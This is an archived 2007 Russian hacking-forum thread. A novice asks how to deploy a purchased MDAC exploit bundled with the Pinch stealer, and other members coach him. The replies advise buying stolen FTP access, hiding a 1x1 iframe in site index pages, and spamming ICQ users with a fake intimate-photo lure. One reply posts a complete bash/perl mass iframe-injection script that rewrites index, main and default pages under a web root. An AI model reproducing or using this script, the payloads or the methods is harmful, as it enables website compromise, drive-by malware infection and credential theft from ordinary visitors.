ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу как залит експлоит на сайт ????????
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

как залит експлоит на сайт ????????
  #1  
Старый 02.05.2007, 01:38
gigabait
Новичок
Регистрация: 25.02.2007
Сообщений: 6
Провел на форуме:
54089

Репутация: -10
По умолчанию как залит експлоит на сайт ????????
привет люди помогите пожалуста!!! купил вот етот сплоит rds сплойт переработанный(mdac) у balmer"a ему уже все мозги проморочил не могу доперет как ево на сайт повесит искал в гоогле нашол статии
про другие споити про ето нече не нашол подскажите че делат как вешат или статию
какуюнибуд дайте но толко подробно а то мне поверхостно он уже обеснил не могу доперет первий раз в жизни со сплоитами дело имею.

<iframe src="http://***********.com/sex/sexy.html" width=1 height=1 frameborder=0></iframe> вот ссилка на мой сплой с пинчем !!

и куда ее на хосте ставит или на фтп моем или с логов. ни как доперет не могу.

разобралса толко што сплоит надо на хост вешат свой сплоит и прописават в ссилку с <iframe src="http:// мой сайте где сплой html" width=1 height=1 frameborder=0></iframe>
замучелса уже 2 дна сежу е**ся
 
Ответить с цитированием

  #2  
Старый 02.05.2007, 02:18
gibson
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049

Репутация: 705
Отправить сообщение для gibson с помощью ICQ
По умолчанию
Возьми хороший учебник по html, прогугли ачат))))) чес слово так и не понял что у тя там и как, куда пинч куда сплойт. кинул бы линки, только не пойму что ты имешь ввиду под словом залить, здесь много способо. Немного почитай что пишут здесь, потом уже берись за что нибудь
 
Ответить с цитированием

  #3  
Старый 02.05.2007, 02:57
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию
Цитата:
<iframe src="http://***********.com/sex/sexy.html" width=1 height=1 frameborder=0></iframe> вот ссилка на мой сплой с пинчем !!
У тебя все готово тебе осталось только, чтобы туда заходили юзеры
покупаешь/ищещь ftp - доступы. Твоя задача открыть index.html(htm/php) файлы и вставить свой iframe
(<iframe src="http://***********.com/sex/sexy.html" width=1 height=1 frameborder=0></iframe>)
, но ручками делать это долго и не приятно. Для этого уже есть готовый ftp/iframe скрипт который все сделает за тебя. KSURI писал на perl поиши на форуме по ключевым словам "ftp/iframe/чекер". Так же можно возпользоватся IMtale ICQ spammer soft - так вот через него просто спам с текстом:
Привет меня зовут Анна
http://***********.com/sex/sexy.html - мои интим фото зацени"
и усе. . . .
Последний раз редактировалось KPOT_f!nd; 02.05.2007 в 02:59..
 
Ответить с цитированием

  #4  
Старый 02.05.2007, 03:14
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию
Да просто зайди по ftp и в httpdocs или public_html в index.php или index.html пропиши свой iframe(вставь) в конце страницы. и все!!! Тоже самое с шеллом (если есть права на запись). Пример: http://www.westonimaginggroup.com/
 
Ответить с цитированием

  #5  
Старый 02.05.2007, 19:02
gigabait
Новичок
Регистрация: 25.02.2007
Сообщений: 6
Провел на форуме:
54089

Репутация: -10
По умолчанию
подсказат кое што когда я сплоитой на сайт ставлю в индех.хтмл
там тег боди в нево надо мой фрайм вставлат дак вопрос старий фрайм надо стерат или нет и еше иногда в редакторе индех.хтмл бивает несколко тегов боди в какой из них вставлат фрайм или просто в незу или на верху странице редакрора ставит мой фрайм
 
Ответить с цитированием

  #6  
Старый 03.05.2007, 01:12
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию
На пользуйся! С тя плюс. Запускается /bin/bash iframe_script
Права лучше nobody!

Код:
#!/bin/bash

usage () {
  echo "##################################################  ######"
  echo "#Shadow iframer[local][n0b0dy version]  (c)ode by Gh0s7#"
  echo "##################################################  ######"
  echo "#usage: ./sh-iframe.sh [iframe file] [path]            #"
  echo "#       ./sh-iframe.sh exploit.html /var/www/31337.su  #"
  echo "##################################################  ######"
  exit 1
}

check=`expr length "$1"`
if [ $check == 0 ]; then 
  usage
fi

check=`expr length "$2"`
if [ $check == 0 ]; then 
  usage
fi

if [ ! -d $2 ]; then
  echo "[x] $2 directory doesnt exists"; exit 1
fi

echo -n "[*]Searching for perl..."; which perl

if [ $? != 0 ]; then
  echo "[x]No perl?"; exit
fi

echo -n "[*]Starting index finder...please wait..."

find $2 -name "index.html*" 2> /dev/null > /tmp/found 
find $2 -name "index.php*"  2> /dev/null >> /tmp/found 
find $2 -name "index.shtml" 2> /dev/null >> /tmp/found 
find $2 -name "index.phtml" 2> /dev/null >> /tmp/found 
find $2 -name "main.html*" 2> /dev/null > /tmp/found 
find $2 -name "main.php*"  2> /dev/null >> /tmp/found 
find $2 -name "default.php*"  2> /dev/null >> /tmp/found 
find $2 -name "main.shtml" 2> /dev/null >> /tmp/found 

len=`cat /tmp/found| wc -l`

echo "search complete. Found $len pages"
echo -n "[*]Generating iframer..."

iframer='\n
while (<INPUT>) {
  chomp; $file = $_;
  @res = split (/\//);
  $len = 0;
  foreach (@res) { $len++; }
  open (FILE, "<$_") or next;
  open (TMP, ">/tmp/$res[$len-1]") or next;
  open (INJECT, "<$inject") or die;
  sysread (INJECT, $code, 1024);
  close (INJECT);
  while (<FILE>) {
    print TMP $_;
    if (/<body>/) { print TMP $code; }
  }
  close (TMP);
  close (FILE);
  system ("./rm /tmp/$res[$len-1].bak 2>/dev/null");
  system ("./mv $file /tmp/$res[$len-1].bak");
  system ("./mv /tmp/$res[$len-1] $file");
}'
echo -ne "#!/usr/bin/perl -w\nopen (INPUT, \"</tmp/found\");\n\$inject=\"$1\";\n" > iframer.pl
echo -ne "$iframer" >> iframer.pl

echo 'mv $@' > /tmp/mv; chmod +x /tmp/mv
echo 'rm $@' > /tmp/rm; chmod +x /tmp/rm

echo "complete.Starting iframer"
perl iframer.pl
echo "[*] Injecting complete, deleting temp files..."
rm /tmp/mv /tmp/rm
rm /tmp/index*
echo "[*] Finished"
exit 0
 
Ответить с цитированием

  #7  
Старый 03.05.2007, 12:21
UZNIK
Новичок
Регистрация: 06.04.2007
Сообщений: 4
Провел на форуме:
63614

Репутация: 0
Отправить сообщение для UZNIK с помощью ICQ
По умолчанию
вот так в конце страници пропиши если что то не понятно можешь стукнуть мне в асю 649435
<html><head></head><body><iframe width=1 height=1 border=0 frameborder=0 src="http://ссылка на эксплойт"></iframe></body></html>
 
Ответить с цитированием

  #8  
Старый 03.05.2007, 13:24
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию
Цитата:
Сообщение от KPOT_f!nd  

Привет меня зовут Анна
http://***********.com/sex/sexy.html - мои интим фото зацени"
и усе. . . .

Сволочь! Так вот кто меня спамил!
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как стать хакером! foreva Болталка 19 12.12.2007 00:12
как сделать сайт? Dim-ka Болталка 6 12.12.2006 14:58
FAQ по выделенным серверам (Dedicated Servers) byte57 Чужие Статьи 4 16.11.2006 22:03
На PHP, как на "Новые ворота"... Mertvii-Listopad Чужие Статьи 7 18.09.2006 12:42
Как ломануть сайт БРИТОГОЛОВЫХ (С О Б) ? Болталка 1 09.06.2003 09:04



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ